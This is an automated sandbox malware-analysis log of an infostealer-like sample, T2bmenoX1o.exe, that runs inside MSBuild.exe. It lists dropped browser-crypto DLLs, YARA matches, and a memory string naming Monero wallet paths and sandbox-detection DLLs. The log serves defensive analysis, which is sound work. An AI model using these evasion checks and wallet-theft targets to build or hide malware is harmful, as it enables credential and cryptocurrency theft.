Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: linkinfo.dll
Source: C:\ProgramData\AAFIIJDAAA.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: T2bmenoX1o.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: T2bmenoX1o.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: T2bmenoX1o.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: T2bmenoX1o.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: T2bmenoX1o.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: T2bmenoX1o.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: T2bmenoX1o.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: freebl3.pdb source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2257843409.000000006CBCD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: freebl3.pdbp source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000001.00000002.2259380459.000000006CD8F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: softokn3.pdb@ source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000001.00000002.2249159673.0000000038339000.00000004.00000020.00020000.00000000.sdmp, vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000001.00000002.2244107241.000000002C45F000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source: Binary string: nss3.pdb source: MSBuild.exe, 00000001.00000002.2259380459.000000006CD8F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.1.dr
Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2257843409.000000006CBCD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: softokn3.pdb source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: T2bmenoX1o.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: T2bmenoX1o.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: T2bmenoX1o.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: T2bmenoX1o.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: T2bmenoX1o.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00418ADE GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00418ADE
Source: sql[1].dll.1.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.1.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.1.dr Static PE information: section name: .00cfg
Source: msvcp140[1].dll.1.dr Static PE information: section name: .didat
Source: softokn3[1].dll.1.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.1.dr Static PE information: section name: .00cfg
Source: freebl3.dll.1.dr Static PE information: section name: .00cfg
Source: mozglue.dll.1.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr Static PE information: section name: .didat
Source: softokn3.dll.1.dr Static PE information: section name: .00cfg
Source: nss3.dll.1.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00E0C1AA push ecx; ret 0_2_00E0C1BD
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DB71AD push ecx; ret 0_2_00DB71C0
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00E0C5D6 push 800003C3h; ret 0_2_00E0C5DD
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00E0C56A push cs; retn 0003h 0_2_00E0C58D
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00E0C654 push cs; retf 0003h 0_2_00E0C655
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00E0EBED push 0000004Ch; iretd 0_2_00E0EBFE
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DFAE1D push ecx; ret 0_2_00DFAE30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0042F2D2 push ecx; ret 1_2_0042F2E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00422EC9 push esi; ret 1_2_00422ECB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041DF45 push ecx; ret 1_2_0041DF58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00432715 push 0000004Ch; iretd 1_2_00432726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB8B536 push ecx; ret 1_2_6CB8B549
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001B71AD push ecx; ret 8_2_001B71C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\nss3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\AAFIIJDAAA.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\a43486128347[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: Yara match File source: 0.2.T2bmenoX1o.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.T2bmenoX1o.exe.dddad8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.T2bmenoX1o.exe.dddad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2226316788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1811230468.0000000000DDD000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: T2bmenoX1o.exe PID: 7284, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7300, type: MEMORYSTR
Source: c:\users\user\desktop\t2bmenox1o.exe Event Logs and Signature results: Application crash and keyboard check
Source: T2bmenoX1o.exe, MSBuild.exe Binary or memory string: DIR_WATCH.DLL
Source: MSBuild.exe, 00000001.00000002.2226316788.0000000000400000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
Source: T2bmenoX1o.exe, MSBuild.exe Binary or memory string: SBIEDLL.DLL
Source: T2bmenoX1o.exe, MSBuild.exe Binary or memory string: API_LOG.DLL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos, 1_2_0040180D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\T2bmenoX1o.exe API coverage: 4.0 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API coverage: 7.9 %
Source: C:\ProgramData\AAFIIJDAAA.exe API coverage: 4.2 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8016 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8028 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 8176 Thread sleep count: 85 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00410DB0 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EC3h 1_2_00410DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DC9ABF FindFirstFileExW, 0_2_00DC9ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00416013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00416013
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 1_2_0041547D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00409CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00409CF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00414D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose, 1_2_00414D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0040D59B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_0040B5B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 1_2_0040BF22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0040B914
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00415B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 1_2_00415B4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 1_2_0040CD0C
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001C9ABF FindFirstFileExW, 8_2_001C9ABF
